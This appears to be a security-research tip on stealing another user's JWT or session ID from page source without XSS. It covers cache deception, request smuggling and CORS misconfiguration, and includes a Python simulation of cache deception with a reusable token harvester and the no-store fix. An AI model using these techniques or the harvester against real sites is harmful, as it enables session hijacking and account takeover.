0x06 - JWT Exfil from Source Page

Did you know you can exfiltrate another user's session ID or JWT from the page source even without being able to run JavaScript in their browser, i.e. with no XSS on the target?

Often we find sensitive info stored insecurely in the app's page source (a session ID or JWT in a meta tag, a hidden field or an inline script variable), but we tend to overlook it because without an XSS we can't run JavaScript on the target origin to read it out.

But there are several other attacks you can weaponize to obtain another user's copy of that page source, and with it the token.


How to do it

  1. Cache Deception - the attacker lures the victim into requesting an authenticated page under a URL the cache treats as static (e.g. with a fake file extension appended). The application ignores the suffix and renders the victim's page, the cache stores it because the URL looks static, and the attacker then retrieves the victim's response from the cache with no cookies at all. Requires the victim to follow a link, and only works if the cache keys on the URL and ignores the origin's Cache-Control / Content-Type.

  2. Request Smuggling - the attacker abuses a disagreement between front-end and back-end about where one HTTP request ends and the next begins on a shared connection, so that responses meant for other users' requests are returned to the attacker instead. If we get the page source of an authenticated user this way, chances are their session ID/JWT is disclosed in it.

  3. CORS Misconfiguration - a reflected Origin header combined with Access-Control-Allow-Credentials: true means any origin can read responses from the vulnerable domain with the victim's cookies attached. This one does need JavaScript, but only on a page you control, never on the target. If the response body contains the session token/JWT, you can read it cross-origin and reuse it. Caveat: the browser only attaches cookies to that cross-site request if they are marked SameSite=None; Secure, so cookies that Chrome treats as Lax by default won't be sent and the response will be the unauthenticated page.
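As an added example (not part of this note, and not code from any real target), here is a self-contained Python simulation of attack 1 against an app that embeds the logged-in user's JWT in the page source: a cache keyed on the URL caches anything with a static-looking extension, the origin ignores the trailing "file name", the victim is lured to the URL, and the attacker reads the victim's page from the cache and pulls the token out with a regex. The routes, cookie value, cache rule and HMAC key are all constructed assumptions; the JWT extractor (find_jwts) is the part you would reuse on any page body obtained through attacks 2 and 3 as well. Flipping honor_no_store shows the cache-side fix.

```python
from __future__ import annotations

import base64
import hashlib
import hmac
import json
import re

# JWTs are three base64url segments; the header segment nearly always starts
# with "eyJ" because that is how '{"' encodes.
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")
DEMO_KEY = b"demo-signing-key"  # constructed; only used to mint a realistic token


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def find_jwts(html: str) -> list[dict]:
    """Pull every JWT-looking string out of a page body and decode its header
    and claims, so the tester can see whose session leaked. Works on any HTML
    the attacks in the note hand you; no JavaScript on the target needed."""
    found = []
    for token in JWT_RE.findall(html):
        head, payload, _sig = token.split(".")
        try:
            header = json.loads(_b64url_decode(head))
            claims = json.loads(_b64url_decode(payload))
        except ValueError:  # covers both bad base64 and bad JSON
            continue  # looked like a JWT but is not one
        found.append({"token": token, "header": header, "claims": claims})
    return found


def make_token(sub: str) -> str:
    """Mint a constructed HS256 token for the hypothetical app below."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps({"sub": sub}).encode())
    sig = hmac.new(DEMO_KEY, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


class Origin:
    """Hypothetical app: /account renders the user's JWT into the page source
    for its front-end JS. It routes on the path prefix and ignores whatever
    follows, which is the path-confusion bug cache deception relies on."""

    def __init__(self, sessions: dict[str, str]):
        self.sessions = sessions  # session cookie value -> user id

    def handle(self, path: str, cookie: str | None) -> tuple[int, dict, str]:
        user = self.sessions.get(cookie)
        if path.startswith("/account") and user:
            body = f'<script>var token = "{make_token(user)}";</script>'
            return 200, {"Content-Type": "text/html", "Cache-Control": "no-store"}, body
        return 401, {"Content-Type": "text/html"}, "<p>login required</p>"


class Cache:
    """Shared cache in front of the origin, keyed on the path only."""

    def __init__(self, origin: Origin, honor_no_store: bool):
        self.origin = origin
        self.honor_no_store = honor_no_store  # False = the vulnerable config
        self.store: dict[str, tuple[int, dict, str]] = {}

    def fetch(self, path: str, cookie: str | None = None) -> tuple[int, dict, str]:
        if path in self.store:
            return self.store[path]  # cache hit: the cookie is never consulted
        resp = self.origin.handle(path, cookie)
        status, headers, _body = resp
        # Vulnerable rule: anything that *looks* static by extension is cached,
        # regardless of what the origin actually returned.
        cacheable = status == 200 and path.endswith((".css", ".js", ".png"))
        if self.honor_no_store and "no-store" in headers.get("Cache-Control", ""):
            cacheable = False
        if cacheable:
            self.store[path] = resp
        return resp


def run_attack(honor_no_store: bool) -> list[str]:
    """Victim (alice) is lured to /account/x.css; the attacker then requests
    the same path with no cookie and harvests whatever JWT is in the body."""
    cache = Cache(Origin({"victim-cookie": "alice"}), honor_no_store)
    cache.fetch("/account/x.css", cookie="victim-cookie")  # victim's click
    _status, _headers, body = cache.fetch("/account/x.css")  # attacker, anonymous
    return [t["claims"]["sub"] for t in find_jwts(body)]


if __name__ == "__main__":
    print("vulnerable cache leaks:", run_attack(honor_no_store=False))  # ['alice']
    print("cache honoring no-store leaks:", run_attack(honor_no_store=True))  # []
```

With the vulnerable cache the attacker's anonymous request returns alice's page and find_jwts recovers her token; once the cache honors the origin's Cache-Control: no-store (or the origin returns 404 for paths it does not actually serve), the attacker only gets the cached-nothing 401 body and no token. In a real test, point find_jwts at the raw response body you captured from the cache, the smuggled response, or the cross-origin fetch.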
